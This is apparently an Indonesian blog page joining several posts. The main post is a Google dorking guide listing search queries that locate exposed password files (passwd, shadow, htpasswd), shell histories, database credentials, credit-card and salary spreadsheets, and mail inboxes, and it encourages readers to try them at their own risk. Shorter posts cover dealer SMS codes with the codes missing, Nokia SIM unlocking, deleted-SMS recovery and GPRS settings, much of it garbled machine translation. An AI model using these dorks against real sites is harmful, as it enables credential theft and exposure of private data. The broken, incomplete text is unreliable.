“inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.
Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut. Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.
>“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.
Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org
“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian :
“filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityf
ocus.com” akan menunjukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan. Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.
Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya. Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.
ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :
inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)
Operator dasar
+, -, ~ , ., *, “”, |, OR
Operator tambahan
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)
Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: edu
Informasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xls
Mencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)
Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”
Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”
Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”
Mencari License Key
Filetype: lic lic intext: key
Sensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamples
saya tak bertanggung jawab atas setiap kegiatan anda yang mengargumenkan artikel ini.........
maaf........ resiko ditanggung sendiri........ by Ferdy Ansa a.k.a Hacker Mania
Baca Selengkapnya...
Memanfaatkan fitur yang tersedia........ ( by mbah google )......
Posting ini benar-benar mungkin terlihat konyol bagi Anda semua tetapi sebenarnya hal-hal yang berguna ..
Di bawah ini tercantum semua kode rahasia yang digunakan oleh (Reliance CDMA) Reliance's dealer, dan spys KnowBest.info s 'telah secara eksklusif mendapatkan semua kode hanya untuk Anda.
Untuk checka tanggal aktivasi nomor tertentu RSN dan nomor mobile
Kirim SMS ke 53.738 berikut:
(Trik ini benar-benar akan bekerja saat ponsel Anda hilang dan Anda ingin memeriksa status)
Untuk memeriksa tanggal aktivasi nomor ponsel tertentu:
Kirim SMS ke 53.738 berikut:
Untuk memeriksa status nomor RSN.
Kirim SMS ke 53.738 berikut:
(Kode ini menunjukkan status handset Anda. Apakah itu dilaporkan hilang atau sebagainya ..)
Untuk memeriksa status aplikasi Anda:
Kirim SMS ke 53.738 berikut:
(Ini benar-benar berguna saat Anda membeli ponsel baru dan Anda ingin memeriksa status penerapannya)
Baca Selengkapnya...
jika Anda ingin membuka ponsel nokia Anda bebas sehingga semua simcards dapat digunakan di dalamnya, ikuti langkah-langkah dengan benar sehingga Anda membuka ponsel nokia tanpa problem.to pun membuka pencarian mobile gratis Anda untuk membuka kode pada bersih atau periksa kembali saya akan posting Anda membuka kode untuk ponsel nokia.
METODE UNTUK UNLOCK LANGKAH - Cara Masukkan Nokia membuka Kode untuk membuka...
1.Hapus simcard Anda dan beralih pada ponsel Anda
2. Tulis pw # + kode 1 # ("kode" dimaksudkan untuk menjadi aktual membuka kode, yang Anda dapat membeli memeriksa posting baru saya)
Huruf P muncul setelah Anda cepat tekan 3 kali tombol bintang (*)
Surat W muncul setelah Anda cepat tekan 4 kali tombol bintang (*)
The + surat muncul setelah Anda cepat tekan 2 kali tombol bintang (*)
Ponsel menunjukkan "SIM Restriction Off" dan telepon dibuka!
cara ini Anda dapat membuka ponsel nokia Anda bebas tanpa risiko membayar untuk banyak layanan centre.you sel bisa melakukannya sepenuhnya gratis jika Anda mengetahui kode unlock ponsel nokia.
Baca Selengkapnya...
Sebuah SMS sekali dihapus tidak dapat dibaca lagi ... pesan. Tapi kadang-kadang kita tidak sengaja menghapus beberapa penting. Berikut adalah teknik yang harus diikuti untuk mengambil SMS dihapus.
Diperlukan utilitas:
1) Setiap sistem atau file explorer explorer program (misalnya fileman atau fexplorer.provided dengan paket)
Langkah 1) Fexplorer Buka... Lihat Selengkapnya
Langkah 2) Pilih drive C: atau D: tergantung pada memori di mana pesan Sms telah disimpan.
Langkah 3) Sebagai contoh u dipilih c:, Lalu terbuka "sistem" folder.
Langkah 4) Kemudian pada "sistem" buka folder "mail" folder.
Langkah 5) Kemudian pada folder ini u akan melihat folder yang berbeda (misalnya 0010001_s) dan file tertentu (misalnya 00100000).
File-file ini adalah pesan yang sebenarnya. Menelusuri setiap folder dan membuka semua file sampai u mendapatkan sms u cari.
Langkah 6) Untuk membuka file yang tidak memilih pilihan> file> terbuka seperti itu akan menampilkan format yang tidak didukung lebih memilih Pilihan> hex file> / penampil teks.
Dengan memilih "Hex / penampil teks" akan ll u bisa membuka dan membaca pesan SMS dihapus
Baca Selengkapnya...
Trick membaca pesan/sms yg telah terhapus
Hampir semua orang pada saat ini mempunyai handphone. Mereka ingin menggunakan handphone mereka secara maksimal seperti menggunakannya untuk akses internet namun mereka tidak tahu bagaimana cara mensetting GPRS handphone mereka sesuai provider yang mereka gunakan masing-masing.
Mereka sudah berusaha untuk menanyakan ke teman mereka, call center operator yang dipakai untuk menanyakan bagaimana caranya mensetting GPRS handphone mereka, namu terkadang upaya tersebut sia-sia. Kami akan memberikan anda cara setting GPRS sesuai provider/operator yang anda gunakan.
- Excelcomindo
APN : www.xlgprs.net
Username: xlgprs
Password: proxl
DNS: /
Proxy: port 8080/9201
- IM3
APN: www.indosat-m3.net / wap.indosat-m3.net
Username: gprs
Password: im3
DNS: /
SMTP: mail.indosat-m3.net
Proxy: port 8080/9201
- Indosat(Matrix)
APN: satelindogprs.com / indosatgprs
Username: guest
Password: guest
DNS: /
SMTP: smtp.indosat.net.id
Proxy: port 8080/9201
- Telkomsel
APN: internet / telkomsel
Username: wap
Password: wap123
DNS: / /
SMTP: mail.telkomsel.com
Proxy: port 8000/9201
Selamat mencoba, Good Luck
Admin: s60_forum
Baca Selengkapnya...
Cara Setting HP sebgai modem GPRS